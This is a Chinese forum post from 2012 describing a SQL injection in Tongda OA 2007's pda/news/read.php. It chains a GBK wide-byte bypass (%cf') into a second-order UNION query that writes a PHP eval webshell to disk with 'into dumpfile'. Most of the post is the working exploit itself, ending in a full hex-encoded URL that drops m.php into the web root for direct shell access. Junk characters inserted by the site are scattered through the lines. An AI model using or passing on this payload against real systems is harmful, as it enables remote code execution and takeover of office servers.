找回密码
 立即注册
查看: 2926|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本
5 d! z& t3 k+ f- {: a! b6 k; q4 z& p* r# a2 V6 T

# B, P6 h- z% W  u3 n3 D, qOffice Anywhere 2007 网络智能办公系统- f9 e5 d1 s7 q& {1 b8 Q

, V; y$ q8 {0 o  g" P8 Y2 ?http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
1 ]# F8 I- ^$ w, L, m0 b4 c
( }/ o5 k3 r7 u' i$ C' G' C # \  I, X4 k) |0 I) z
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
9 d; Y+ {. k+ t
: r+ O8 V4 _9 A& T, t例如:SELECT * from USER where USER_ID='{$USERNAME}'  ' {" u1 _  }1 L* d6 N0 _
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了4 I% g2 S8 a8 g, P! s3 P

! I# |% a% w4 a" @2 p! ^这个时候我们是不是可以组合起来使用哪?) r3 w8 p# R; f0 W7 |/ k  `
8 _3 X$ y3 k3 V$ v0 f/ P
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样5 x/ T% ^! C# z) Y% m
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
. c. W+ ^9 F6 t & a* p9 P* n6 j6 U% I
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
6 d0 V& R. x1 }) _  ~. |  v + P1 t0 C4 {9 e
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。& J$ Z( p" h+ L  {

$ I* r! r# `/ f6 g, D- |& ~那么我们用字符串格式带入进行hex编码
2 l' L6 t3 L0 P- j " G9 a. ]. n8 _! \
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
* _" B, @! }# w" |( b$ k6 d   r, g- B+ y+ s* X' z7 h% z# G* |: p
测试ok,获取oa的webshell
" E& r1 c+ t- m 7 M- F* j, p& E2 \4 J

" M& o! v1 {2 y! k+ @/ l6 c7 R1 ?pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
' g: C0 t$ `+ ]8 U' k- x直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表